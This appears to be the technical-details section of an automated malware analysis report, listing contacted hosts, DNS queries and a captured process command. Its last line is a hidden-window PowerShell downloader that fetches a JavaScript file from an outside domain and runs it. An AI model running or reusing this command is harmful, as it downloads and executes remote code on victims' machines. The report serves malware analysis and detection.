Техническая информация
- 'xo######hingforsavings.com':443
- http://10#.#43.33.208/cneifh8/
- http://oc##.###-x3.letsencrypt.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBR%2B5mrncpqz%2FPiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7%2FOo7KECEgRYPPoM8zOksvY8ajkB132p%2FQ%3D%3D
- DNS ASK xo######hingforsavings.com
- DNS ASK oc##.###-x3.letsencrypt.org
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' $yugujg='kjxrchvjb';iex($env:clower);$footer=$env:temp+'\1563357668099.js';$glow.DownloadFile('https://xoo3efishingforsavings.com/1563357696444.js',$footer);Invoke-Item $footer;' (со скрытым окном)